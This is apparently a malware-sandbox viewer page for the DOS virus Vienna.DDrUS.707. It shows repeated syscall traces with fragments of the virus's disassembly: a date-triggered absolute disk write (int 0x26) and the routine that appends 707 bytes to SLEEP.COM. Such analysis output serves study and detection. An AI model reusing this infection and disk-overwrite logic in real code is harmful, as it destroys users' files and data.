Sample viewer

vx.netlux.org/Virus.DOS.Vienna.DDrUS.707

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:16.743628261Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:50:16.746460458Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:50:16.747804685Z 26 PC: 12a8a | Set disk transfer address
2018-12-17T22:50:16.749096719Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-17T22:50:16.752639864Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-17T22:50:16.754696984Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
0x12ad0: add si, 0x31
0x12ad3: nop
0x12ad4: lodsb al, byte ptr [si]
0x12ad5: mov cx, 0x8000
0x12ad8: repne scasb al, byte ptr es:[di]
0x12ada: mov cx, 4
2018-12-17T22:50:16.756780479Z 78 PC: 12b51 | Find first file
2018-12-17T22:50:16.762927568Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T22:50:16.768751899Z 67 PC: 12ba1 | Get or set file attributes
2018-12-17T22:50:16.930062666Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:16.936997118Z 87 PC: 12bb8 | Get or set file date and time
2018-12-17T22:50:16.940012894Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-17T22:50:16.942460107Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:50:16.949425319Z 66 PC: 12be9 | Move file pointer
2018-12-17T22:50:16.952147849Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-17T22:50:16.960623577Z 66 PC: 12c1f | Move file pointer
2018-12-17T22:50:16.961871327Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:50:16.968699054Z 87 PC: 12c41 | Get or set file date and time
2018-12-17T22:50:16.970042613Z 62 PC: 12c45 | Close file
2018-12-17T22:50:16.977526936Z 67 PC: 12c54 | Get or set file attributes
2018-12-17T22:50:16.987808238Z 26 PC: 12c61 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10167,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:21.126371991Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:27:21.129862224Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:27:21.132516387Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:27:21.134482181Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:27:21.137174318Z 78 PC: 12b51 | Find first file
2018-12-25T12:27:21.144928501Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:27:21.151601629Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:27:21.170286549Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:21.179444248Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:27:21.181177842Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:27:21.183549715Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:21.191421807Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:27:21.193028605Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-25T12:27:21.203243287Z 66 PC: 12c1f | Move file pointer
2018-12-25T12:27:21.205301331Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:21.212725093Z 87 PC: 12c41 | Get or set file date and time
2018-12-25T12:27:21.214347658Z 62 PC: 12c45 | Close file
2018-12-25T12:27:21.22344548Z 67 PC: 12c54 | Get or set file attributes
2018-12-25T12:27:21.235065438Z 26 PC: 12c61 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10167,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:21.201992408Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:27:21.2035846Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:27:21.204584782Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:27:21.205393304Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:27:21.206931543Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
0x12ac6: mov bx, word ptr [di + 0x63]
0x12ac9: int 0x26
0x12acb: jmp 0x12ace
0x12acd: nop
0x12ace: pop si
0x12acf: push si
2018-12-25T12:27:21.209022046Z 78 PC: 12b51 | Find first file
2018-12-25T12:27:21.213131441Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:27:21.216832637Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:27:21.228976924Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:21.23369568Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:27:21.23468041Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:27:21.23897629Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:21.245850447Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:27:21.247607196Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-25T12:27:21.25737715Z 66 PC: 12c1f | Move file pointer
2018-12-25T12:27:21.258751105Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:21.2659235Z 87 PC: 12c41 | Get or set file date and time
2018-12-25T12:27:21.268776678Z 62 PC: 12c45 | Close file
2018-12-25T12:27:21.277629901Z 67 PC: 12c54 | Get or set file attributes
2018-12-25T12:27:21.288494103Z 26 PC: 12c61 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10167,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:21.684277899Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:27:21.68575105Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:27:21.68696293Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:27:21.687935335Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:27:21.690477229Z 78 PC: 12b51 | Find first file
2018-12-25T12:27:21.696405631Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:27:21.701841414Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:27:21.720241307Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:21.726709211Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:27:21.727945633Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:27:21.729919091Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:21.73656256Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:27:21.738386621Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-25T12:27:21.746861556Z 66 PC: 12c1f | Move file pointer
2018-12-25T12:27:21.748834987Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:21.75546498Z 87 PC: 12c41 | Get or set file date and time
2018-12-25T12:27:21.757154645Z 62 PC: 12c45 | Close file
2018-12-25T12:27:21.773680076Z 67 PC: 12c54 | Get or set file attributes
2018-12-25T12:27:21.784014718Z 26 PC: 12c61 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10167,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:22.030996066Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:27:22.033069688Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:27:22.034597421Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:27:22.036210335Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:27:22.039119562Z 78 PC: 12b51 | Find first file
2018-12-25T12:27:22.04651436Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:27:22.053013253Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:27:22.070407256Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:22.078528181Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:27:22.080215777Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:27:22.082695818Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:22.090662117Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:27:22.092280007Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-25T12:27:22.102234044Z 66 PC: 12c1f | Move file pointer
2018-12-25T12:27:22.104371771Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:22.111840119Z 87 PC: 12c41 | Get or set file date and time
2018-12-25T12:27:22.113697651Z 62 PC: 12c45 | Close file
2018-12-25T12:27:22.122723741Z 67 PC: 12c54 | Get or set file attributes
2018-12-25T12:27:22.134034883Z 26 PC: 12c61 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10167,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:22.993778026Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:27:22.995249622Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:27:22.996165757Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:27:22.997102085Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:27:22.999713982Z 78 PC: 12b51 | Find first file
2018-12-25T12:27:23.005486339Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:27:23.01089083Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:27:23.028809101Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:23.035175806Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:27:23.036365716Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:27:23.038421898Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:23.044652593Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:27:23.045773164Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-25T12:27:23.054221743Z 66 PC: 12c1f | Move file pointer
2018-12-25T12:27:23.055668536Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:23.061814865Z 87 PC: 12c41 | Get or set file date and time
2018-12-25T12:27:23.062977646Z 62 PC: 12c45 | Close file
2018-12-25T12:27:23.07370852Z 67 PC: 12c54 | Get or set file attributes
2018-12-25T12:27:23.083764475Z 26 PC: 12c61 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10167,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:23.146661823Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:27:23.148071155Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:27:23.149058495Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:27:23.149925168Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7c6
0x12a9e: jge 0x12aa3
0x12aa0: jmp 0x12ace
0x12aa2: nop
0x12aa3: mov ah, 0x2a
0x12aa5: int 0x21
0x12aa7: cmp dh, 6
0x12aaa: jge 0x12aaf
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16
0x12ab6: jge 0x12abb
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1
0x12abd: mov cx, 1
0x12ac0: mov dx, 0
0x12ac3: mov ds, word ptr [di + 0x37]
2018-12-25T12:27:23.15224204Z 78 PC: 12b51 | Find first file
2018-12-25T12:27:23.158109097Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:27:23.163627178Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:27:23.179097463Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:23.186458427Z 87 PC: 12bb8 | Get or set file date and time
2018-12-25T12:27:23.18788231Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7
0x12bc7: jmp 0x12bca
0x12bc9: nop
0x12bca: mov ah, 0x3f
0x12bcc: mov cx, 3
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si
0x12bd5: int 0x21
0x12bd7: jb 0x12c2e
0x12bd9: cmp ax, 3
0x12bdc: jne 0x12c2e
0x12bde: mov ax, 0x4202
0x12be1: mov cx, 0
0x12be4: mov dx, 0
0x12be7: int 0x21
0x12be9: jb 0x12c2e
0x12beb: mov cx, ax
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax
2018-12-25T12:27:23.189910464Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:23.197011974Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:27:23.198733974Z 64 PC: 12c0d | Write file or device (Write 707 bytes on handle 5)
2018-12-25T12:27:23.207364153Z 66 PC: 12c1f | Move file pointer
2018-12-25T12:27:23.21001449Z 64 PC: 12c2e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:23.216744063Z 87 PC: 12c41 | Get or set file date and time
2018-12-25T12:27:23.219083179Z 62 PC: 12c45 | Close file
2018-12-25T12:27:23.228225364Z 67 PC: 12c54 | Get or set file attributes
2018-12-25T12:27:23.238190097Z 26 PC: 12c61 | Set disk transfer address